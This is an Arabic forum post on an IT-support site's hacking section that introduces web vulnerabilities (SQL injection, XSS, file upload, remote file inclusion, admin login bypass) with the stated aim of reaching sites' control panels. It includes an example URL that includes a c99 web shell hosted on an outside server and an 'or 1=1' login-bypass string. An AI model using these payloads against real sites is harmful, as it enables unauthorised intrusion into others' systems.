منتـديات الدعـم و تقنيـة المعلـومـات

منتـديات الدعـم و تقنيـة المعلـومـات
 
الرئيسيةالرئيسية  البوابةالبوابة  اليوميةاليومية  الأحداثالأحداث  المنشوراتالمنشورات  س .و .جس .و .ج  بحـثبحـث  التسجيلالتسجيل  دخولدخول  
بحـث
 
 

نتائج البحث
 
Rechercher بحث متقدم
المواضيع الأخيرة
» قوانين القسم
ما هى الثغره؟ او الثغرات Emptyالخميس أبريل 11, 2019 1:56 am من طرف support service

» قوانين القسم
ما هى الثغره؟ او الثغرات Emptyالخميس أبريل 11, 2019 1:56 am من طرف support service

» قوانين القسم
ما هى الثغره؟ او الثغرات Emptyالخميس أبريل 11, 2019 1:55 am من طرف support service

» قوانين القسم
ما هى الثغره؟ او الثغرات Emptyالخميس أبريل 11, 2019 1:51 am من طرف support service

» احدث انواع وماركات كاميرات المراقبة
ما هى الثغره؟ او الثغرات Emptyالثلاثاء أبريل 09, 2019 5:06 pm من طرف مازن محمد خالد

» للمبتدئين في مجال تعلم الأختراق و الهكر
ما هى الثغره؟ او الثغرات Emptyالأحد مارس 24, 2019 2:17 am من طرف support service

» اهزم الاكتئاب وابحث عن فرصة عمل جديدة
ما هى الثغره؟ او الثغرات Emptyالخميس مارس 07, 2019 7:48 pm من طرف ملك الالعاب

»  تشغيل ألعاب الاندرويد على الكمبيوتر
ما هى الثغره؟ او الثغرات Emptyالثلاثاء يناير 29, 2019 10:37 am من طرف ملك الالعاب

» *(قالت احبك قلت صفي طابور )*
ما هى الثغره؟ او الثغرات Emptyالسبت سبتمبر 29, 2018 3:59 am من طرف support service

ازرار التصفُّح
 البوابة
 الرئيسية
 قائمة الاعضاء
 البيانات الشخصية
 س .و .ج
 بحـث
ازرار التصفُّح
 البوابة
 الرئيسية
 قائمة الاعضاء
 البيانات الشخصية
 س .و .ج
 بحـث
ازرار التصفُّح
 البوابة
 الرئيسية
 قائمة الاعضاء
 البيانات الشخصية
 س .و .ج
 بحـث
المواضيع الأكثر نشاطاً
ما رأيك بقيادة المرأة
ودعتك وقلبي معاك ..
صور وعبارات ترحيبيه
يقال عندنا في العامية .متجدد
اهزم الاكتئاب وابحث عن فرصة عمل جديدة

شاطر
 

 ما هى الثغره؟ او الثغرات

اذهب الى الأسفل 
كاتب الموضوعرسالة
support service
Admin
Admin
support service

عدد المساهمات : 138
السٌّمعَة : 0
تاريخ التسجيل : 03/06/2011

ما هى الثغره؟ او الثغرات Empty
مُساهمةموضوع: ما هى الثغره؟ او الثغرات   ما هى الثغره؟ او الثغرات Emptyالإثنين مايو 08, 2017 2:09 am


ما هى الثغره؟
هو خطأ برمجى يقع به المبرمج يمكننا من خلاله الوصول الى لوحة تحكم الموقع

كيف يتم استغلال الثغره ؟ في الدرس القادم ستعلم كيف عمل ذلك

كيفية البحث عن الثغره ؟ للبحث عن الثغرات تستطيع البحث يدويا او عن طريق مواقع ما وطرق البحث سهله جدا جدا



انواع الثغرات او بعض انواعها

لا اخفي عليكم متابعينى الكرام ان الثغرات كثيره ولن نعيد الكلام عن ثغرة اسكول فزاد الكلام عنها واظن الجميع قد شرحها وهو عن طريق الحقن

ولكن ارجو الانتباه ان 33% من المواقع مصابه بهذه الثغره

فلذلك سأعيد الكلام عنها ولكن بنقاط مختلفه .. هذه الثغره سهل استخدامها جدا وناجحه جدا ولكنها مقرفه بعض الشيء وهى بسبب الحقن وقد يدوم الحقن من 5 ال 10 ساعات او اكثر -_-

بس لازم نتعلم طرق استغلالها

والشرح القادم سأقدم ذلك



ومن انواع هذه الثغرات ما يأتى :



1_ ثغرة XXS بهذه الثغره تستطيع عمل الكثير للوصول الى لوحة تحكم الموقع

وبهذا الكود ’zer0o0-hacker’)

تستطيع معرفة ان كانت الثغره تعمل داخل الموقع ام لا

وسنأتى بالشرح عنها قريبا

...................................................................................

2_ ثغرات الرفع :::: Remote File Uploed

هذه الثغرات تمكننا من رفع ملف على الموقع كثغرات مراكز التحميل

ولكن لا تعمل مع جميع مواقع التحميل وهى عن طريق رفع الشيل الخاص بك وعليك بخداع الموقع وتغيير الامتداد والحديث عنها كثير وناجحه بعض الشيء

وسيأتى الكلام عنها ان كان يوجد وقت

............................................................................................

3_ ثغرة -Remote File Inclusion | ثغرات فايل انكلود.

وهذه من افضل الثغرات من وجهة نظرى ومن مميزاتها انك تستطيع استغلال الثغره دون الانتظار لرفع الشيل والوصول الى ما تريد عن طريق اوامر لينكس مباشرة

مثال

http://www.site.com/qtronix.php?fox=http://www.sh3ll.org/c99.txt?
نشرحها.
www.site.com: موقع الضحية
qtronix.php?: اسم الملف المصاب بالثغرة.
fox=: المتغيير المصاب والذي سيتم وضع رابط الشل الي بامتداد txt عليه.
http://www.sh3ll.org/c99.txt?: هذا هو رابط الشل الي بامتداد txt, ويجب وضع علامة السؤال [؟] في نهاية رابط الشل لكى يستعرض معك الشل ..

...........................................................................

4_ ثغرة : bypass admin control panal
هذه الثغرات تسمح لنا بتجاوز لوحة التحكم control panal الخاصه بأدمن الموقع . اي تخطي صفحة طلب الباسبورد والاسم المرخص لهم بدخول لوحة تحكم .:.
طريقة {{{{{ or 1=1}}}}}}}}}}} حسب الرموز التي تدخلها والرموز كثيرة جدا .:. او عن طريقة الدخول على اي ملف من ملفات المجلد من خلال السكربت



واخيرا وليس اخيرا فالثغرات كثيره جدا وطرق استغلالها اكثر
الرجوع الى أعلى الصفحة اذهب الى الأسفل
https://www.support7service.com/
 
ما هى الثغره؟ او الثغرات
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
منتـديات الدعـم و تقنيـة المعلـومـات :: منتـــدى الـتـقـنـيـات الـحـديـثـة :: قـســم الهكـــرز والثغـــرات-
انتقل الى: